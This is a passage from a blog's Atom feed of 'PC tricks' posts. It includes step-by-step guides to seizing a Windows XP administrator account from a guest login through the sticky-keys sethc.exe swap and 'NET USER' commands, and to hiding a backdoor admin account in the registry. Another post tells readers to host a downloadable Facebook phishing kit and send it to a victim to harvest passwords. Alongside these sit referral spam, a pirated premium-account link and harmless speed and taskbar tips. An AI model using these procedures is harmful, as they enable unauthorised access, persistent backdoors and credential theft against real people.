&lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Prerequisites&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;Guest account with write access to system 32.&lt;br /&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: rgb(204, 0, 0);"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="IL_AD" id="IL_AD5"&gt;Procedure&lt;/span&gt; To Hack &lt;span class="IL_AD" id="IL_AD9"&gt;windows XP&lt;/span&gt; administrator Password&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;  &lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Method 1 (Change Admin Password)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;br /&gt;Here is how to do that -&lt;br /&gt;&lt;br /&gt;1.Go to &lt;/span&gt;&lt;/span&gt;  &lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;C:/windows/system32&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;br /&gt;2.Copy cmd.exe and paste it on desktop&lt;br /&gt;&lt;br /&gt;3.Rename &lt;/span&gt;&lt;/span&gt;  &lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;cmd.exe&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; to &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;sethc.exe&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;br /&gt;4.Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.&lt;br /&gt;&lt;br /&gt;5.Now Log out from your guest account and at the user select window,press shift key 5 times.&lt;br /&gt;&lt;br /&gt;6.nstead of Sticky Key &lt;span class="IL_AD" id="IL_AD11"&gt;confirmation&lt;/span&gt; dialog,command prompt with full administrator &lt;span class="IL_AD" id="IL_AD10"&gt;privileges&lt;/span&gt; will open.&lt;br /&gt;&lt;br /&gt;7.Now type “ &lt;/span&gt;&lt;/span&gt;    &lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;NET USER ADMINISTRATOR aaa&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;" where “aaa" can be any password you like and press enter.&lt;br /&gt;&lt;br /&gt;8.You will see “ The Command completed successfully" and then exit the command prompt and login into&lt;br /&gt;administrator with your &lt;span class="IL_AD" id="IL_AD8"&gt;new password&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;9.Congrats You have &lt;/span&gt;&lt;/span&gt;  &lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;hacked admin through guest account&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;.&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;  &lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Method 2 (Access admin without &lt;span class="IL_AD" id="IL_AD1"&gt;changing password&lt;/span&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;br /&gt;Also, you can further create a new user at the command prompt by typing “NET USER How to hack /ADD" where "&lt;/span&gt;&lt;/span&gt; &lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;How to hack&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;" is the username you would like to add with administrator privileges. Then hide your newly created admin account by -&lt;br /&gt;&lt;br /&gt;Go to &lt;/span&gt;&lt;/span&gt; &lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;registry editor &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;and navigate to this &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;key&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;  &lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(51, 102, 255);" class="fullpost"&gt;&lt;blockquote&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;br /&gt;Here create a new "&lt;/span&gt;&lt;/span&gt; &lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;DWORD value&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;",  write its name as the “How to hack" (the username that you entered in  the previous step),now you can live with your admin account forever enjoy&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-6702890111877897473?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/6702890111877897473/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/06/hack-administrators-password-through.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6702890111877897473'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6702890111877897473'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/06/hack-administrators-password-through.html' title='hack administrators password through guest login'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-5848285645878399835</id><published>2011-06-07T19:05:00.000-07:00</published><updated>2011-06-07T19:08:05.915-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='speed'/><category scheme='http://www.blogger.com/atom/ns#' term='internet'/><title type='text'>how to increase your internet speed</title><content type='html'>&lt;span style="color: rgb(51, 102, 255);"&gt;Method 1&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;The following post is on will tell you some methods to increase your  internet speed,I will show you some ways to increase your net and &lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;browser speed&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Go to Start&amp;gt;&amp;gt;Run and then type in “gpedit.msc” without the quotes (“)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);" class="fullpost"&gt;&lt;br /&gt;&lt;span class="IL_AD" id="IL_AD2"&gt;Computer Configuration&lt;/span&gt; -&amp;gt; Administrative Templates -&amp;gt; Network -&amp;gt; QoS Packet &lt;span class="IL_AD" id="IL_AD7"&gt;Scheduler&lt;/span&gt;.&lt;br /&gt;after that, you should see something like “Limit Reservable Bandwidth”. Modify that and set it to “&lt;b&gt;Disabled&lt;/b&gt;”, or you can put it to “Enabled” and change the value to 0.&lt;br /&gt;&lt;br /&gt;Now this will &lt;span style="font-weight: bold;"&gt;increase your internet speed&lt;/span&gt; by 20%&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Method 2&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;span style="color: rgb(51, 102, 255);" &gt;1)&lt;b&gt; Speed Up the Firefox.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt; &lt;b&gt;Just do the following steps:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;b style="color: rgb(51, 102, 255);"&gt;&lt;br /&gt;&lt;br /&gt;* &lt;/b&gt; &lt;span style="color: rgb(106, 168, 79);"&gt;&lt;b style="color: rgb(51, 102, 255);"&gt;Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:&lt;br /&gt;&lt;br /&gt;network.http.pipelining&lt;br /&gt;network.http.proxy.pipelining&lt;br /&gt;network.http.pipelining.maxrequests&lt;br /&gt;&lt;br /&gt;* Alter the entries do as follows:&lt;br /&gt;&lt;br /&gt;Set "network.http.pipelining" to "true"&lt;br /&gt;&lt;br /&gt;Set "network.http.proxy.pipelining" to "true"&lt;br /&gt;&lt;br /&gt;Set "network.http.pipelining.maxrequests" to some &lt;span class="IL_AD" id="IL_AD5"&gt;number&lt;/span&gt; like 30.&lt;br /&gt;&lt;br /&gt;* Lastly right-click anywhere and select New-&amp;gt; Integer.&lt;br /&gt;Name it "nglayout.initialpaint.delay" and set its value to "0".&lt;/b&gt;       &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-5848285645878399835?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/5848285645878399835/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/06/how-to-increase-your-internet-speed.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/5848285645878399835'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/5848285645878399835'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/06/how-to-increase-your-internet-speed.html' title='how to increase your internet speed'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-6769580494293827683</id><published>2011-04-10T17:06:00.001-07:00</published><updated>2011-04-10T17:06:59.588-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='facebookhack'/><title type='text'>hack facebook password</title><content type='html'>&lt;span class="Apple-style-span" style="border-collapse: separate; color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;"&gt;&lt;span class="Apple-style-span" style="text-align: left;"&gt;&lt;p style="margin: 0px;"&gt;hi you wondering how to hack facebook password there are so many ways of hacking facebook password&lt;/p&gt;&lt;p style="margin: 0px;"&gt;some of them are mention below&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;b&gt;1.Facebook&lt;span class="Apple-converted-space"&gt; &lt;/span&gt;&lt;span class="IL_AD" id="IL_AD3"&gt;phishing&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;b&gt;2.Keylogging and stealer&lt;/b&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;b&gt;3&lt;/b&gt;.&lt;b&gt;java scripts&lt;/b&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;b&gt;4&lt;/b&gt;.&lt;b&gt;virus(trojan)&lt;/b&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;we will look here only two methods namely phishing and keyloggin&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;what is phishing(fake login page)&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;Phishing is when you are led to a fake website, such as a fake bank website where someone can get your details when you log on.&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;Facebook Phishing is one of the most preferred method used for hacking Facebook password.&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;Follow the Steps Below To HACK any facebook ID using Phishing...&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;Download facebook phishing page from here&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;b&gt;&lt;a href="http://www.mediafire.com/?bfpg6s9w6a4w53x"&gt;&lt;span class="Apple-style-span"  style="font-size:6;"&gt;Download&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;download file contains&lt;/p&gt;&lt;p style="margin: 0px;"&gt;index.html and write.php files&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;Upload both index.html and write.php to following sites&lt;/p&gt;&lt;p style="margin: 0px;"&gt;http://www.yourfreehosting.net/&lt;/p&gt;&lt;p style="margin: 0px;"&gt;or&lt;/p&gt;&lt;p style="margin: 0px;"&gt;http://www.t35.com&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;or&lt;/p&gt;&lt;p style="margin: 0px;"&gt;http://www.my3gb.com&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;or&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;http://www.justfree.com&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;or&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;http://www.110mb.com&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt; there are many sites go and find those&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt; Now, send this phisher page to your victim and make him login to his Facebook account using your sent Phisher.&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt; Once he logs in to his Facebook account using Phisher, all his typed Facebook id and password is stored in "passes.txt". This file is created in your web host control panel&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt; Now, open "passes.txt" to get hacked Facebook id and password&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0px;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-6769580494293827683?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/6769580494293827683/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2011/04/hack-facebook-password.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6769580494293827683'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6769580494293827683'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2011/04/hack-facebook-password.html' title='hack facebook password'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-741017451508883558</id><published>2010-12-31T22:37:00.000-08:00</published><updated>2010-12-31T22:38:51.374-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='password'/><category scheme='http://www.blogger.com/atom/ns#' term='facebook'/><category scheme='http://www.blogger.com/atom/ns#' term='net'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Facebook Password Hack</title><content type='html'>Hack any faCebook password&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;go here&lt;br /&gt;&lt;br /&gt;&lt;a href="www.facebookpasswordhack.net"&gt;www.facebookpasswordhack.net&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-741017451508883558?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/741017451508883558/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/12/facebook-password-hack.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/741017451508883558'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/741017451508883558'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/12/facebook-password-hack.html' title='Facebook Password Hack'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-4356092500439347275</id><published>2010-10-11T18:40:00.000-07:00</published><updated>2010-10-11T18:42:31.991-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='earn'/><category scheme='http://www.blogger.com/atom/ns#' term='money'/><title type='text'>Earn Money For just uploading files 0.40$/file</title><content type='html'>&lt;a href="http://sharecash.org/index.php?ref=419481"&gt;CLIK HERE TO JOIN&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sharecash.org/index.php?ref=419481"&gt;CLIK HERE TO JOIN&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sharecash.org/index.php?ref=419481"&gt;CLIK HERE TO JOIN&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sharecash.org/index.php?ref=419481"&gt;CLIK HERE TO JOIN&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sharecash.org/index.php?ref=419481"&gt;CLIK HERE TO JOIN&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sharecash.org/index.php?ref=419481"&gt;&lt;br /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-4356092500439347275?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/4356092500439347275/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/10/earn-money-for-just-uploading-files.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/4356092500439347275'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/4356092500439347275'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/10/earn-money-for-just-uploading-files.html' title='Earn Money For just uploading files 0.40$/file'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-1747741017615673958</id><published>2010-10-08T09:17:00.000-07:00</published><updated>2010-10-08T09:21:33.518-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='rapidshare'/><category scheme='http://www.blogger.com/atom/ns#' term='account'/><category scheme='http://www.blogger.com/atom/ns#' term='premium'/><title type='text'>RAPIDSHARE PREMIUM ACCOUNT OCTOBER 2010 WORKING</title><content type='html'>Download rapidshare premium account from following link&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://fileups.net/0Gbx1"&gt;CLIK HERE TO DOWNLOAD&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;thanks and do comment please :D&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-1747741017615673958?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/1747741017615673958/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/10/rapidshare-premium-account-october-2010.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1747741017615673958'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1747741017615673958'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/10/rapidshare-premium-account-october-2010.html' title='RAPIDSHARE PREMIUM ACCOUNT OCTOBER 2010 WORKING'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-1674072954124274336</id><published>2010-10-01T00:44:00.000-07:00</published><updated>2010-10-01T00:48:43.677-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='taskbar'/><title type='text'>Adding Your Name Beside Taskbar Clock(system tray) – In Windows</title><content type='html'>Here is the Old trick (For windows XP):-&lt;br /&gt;&lt;br /&gt;1. Click on Start menu. Then on Control panel.&lt;br /&gt;2. Now click on “Regional and Language Options” icon.&lt;br /&gt;3. In the “Regional Options” tab, click on “Customize” button.&lt;br /&gt;4. After clicking “Customize” button, another window pops up. Now click on the “Time” tab.&lt;br /&gt;5. Besides AM Symbol and PM Symbol, you can add anything that you want to display in the system tray.&lt;br /&gt;6. If there is limitation of characters, you can even delete the AM and/or PM symbol. Apply, OK. Done.. Look at your task bar&lt;br /&gt;&lt;br /&gt;For Vista : In the bottom of the Format tab click on Customize this format button.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="line-height: 1.3em;font-size:10pt;" &gt;Limitation of this old trick:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;You might have already observed that, you can not insert more than 12 characters(after deleting the AM and PM symbol).&lt;br /&gt;&lt;br /&gt;To over come this limitation, we shall enter into registry.(Tested in Windows XP)&lt;br /&gt;1. Click on Start button.&lt;br /&gt;2. Click on Run.&lt;br /&gt;3. Type regedit. Click Ok.&lt;br /&gt;4. Now click the plus mark besides each of these -&gt; HKEY_CURRENT_USER and then Control Panel and then International.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_RytRT09XgrE/TKWRrJ5wmOI/AAAAAAAAAC0/d-O3c6Cy4Xw/s1600/windows-registry.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 207px;" src="http://4.bp.blogspot.com/_RytRT09XgrE/TKWRrJ5wmOI/AAAAAAAAAC0/d-O3c6Cy4Xw/s320/windows-registry.jpg" alt="" id="BLOGGER_PHOTO_ID_5522980688618363106" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;5. Now click on International. And find these s1159 and s2359. Right  click and select “Modify Binary Data“, as shown in the above figure.&lt;br /&gt;6. Now follow the above figure and modify the name.&lt;br /&gt;Do not change the  numbers. Just modify the text in the right most side. See to that,  there is a period (DOT) after each character and 3 dots to  specify/display a DOT in the system tray&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-1674072954124274336?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/1674072954124274336/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/10/adding-your-name-beside-taskbar.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1674072954124274336'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1674072954124274336'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/10/adding-your-name-beside-taskbar.html' title='Adding Your Name Beside Taskbar Clock(system 